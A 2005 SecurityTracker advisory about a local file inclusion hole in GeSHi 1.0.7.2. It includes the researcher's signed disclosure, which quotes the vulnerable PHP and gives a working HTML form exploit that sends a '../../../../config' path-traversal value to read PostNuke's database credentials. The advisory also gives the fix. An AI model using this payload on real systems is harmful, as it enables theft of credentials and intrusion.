GeSHi Input Validation Hole Lets Remote Users Include Local Files
|
|
SecurityTracker Alert ID: 1014972
|
|
SecurityTracker URL: http://securitytracker.com/id?1014972
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 27 2005
|
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 1.0.7.2
|
Description: Maksymilian Arciemowicz of SecurityReason.com reported a vulnerability in GeSHi. A remote user can include arbitrary local files.
The 'contrib/example.php' script does not properly validate user-supplied input in the 'language' parameter. A remote user can supply
a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a local file on the target system.
The PHP code, including operating system commands, will run with the privileges of the target web service. This can also be exploited
to view files on the target system.
|
Impact: A remote user can include and execute PHP code and operating system commands from local files on the target system or view certain files on the target system.
|
Solution: The vendor has issued a fixed version (1.0.7.3), available at:
http://sourceforge.net/project/showfiles.php?group_id=114997
|
Vendor URL: qbnz.com/highlighter/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Maksymilian Arciemowicz <max@jestsuper.pl>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 23 Sep 2005 07:10:43 +0200
From: Maksymilian Arciemowicz <max@jestsuper.pl>
Subject: GeSHi Local PHP file inclusion 1.0.7.2
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[GeSHi Local PHP file inclusion 1.0.7.2]
Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005
from SECURITYREASON.COM
- --- 0.Description ---
GeSHi started as a mod for the phpBB forum system, to enable highlighting of
more languages than the available (which was 0 ;)). However, it quickly
spawned into an entire project on its own. But now it has been released, work
continues on a mod for phpBB - and hopefully for many forum systems, blogs
and other web-based systems.
Several systems are using GeSHi now, including:
PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool
- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
In file:
- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
if ( get_magic_quotes_gpc() ) $_POST['source'] =
stripslashes($_POST['source']);
if ( !strlen(trim($_POST['source'])) )
{
$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] .
'.php'));
$_POST['language'] = 'php';
}
- -10-18-line---
Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can
read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file.
I have tested this bug in GeSHi package and in PostNuke 0.760.
PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)
We can read config.php in PostNuke where we have login, password, dbname and
dbhost.
All variables needed to log in to database.
So we can just use this exploit below :
- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
<center><a href="http://securityreason.com"
target="http://securityreason.com/"><img
src="http://securityreason.com/gfx/small_logo.png"></a><p>
<form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php"
method="post">
Path to file:<br>
example: <b>../../../../config</b><br>
<textarea name="language"></textarea><br>
<input type="submit" name="submit" value="See">
</form>
- --- EXPLOIT FOR POSTNUKE 0.760 ---
[HOST] = example. http://www.securityreason.com/postnuke/html
any questions? ;]
- --- 2. How to fix ---
Patch
http://securityreason.com/patch/2
works in PostNuke 0.760
or new version of script 1.0.7.3
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm
MWVTap2Adcne2IMt7OpZHmM=
=JulS
-----END PGP SIGNATURE-----
|
|
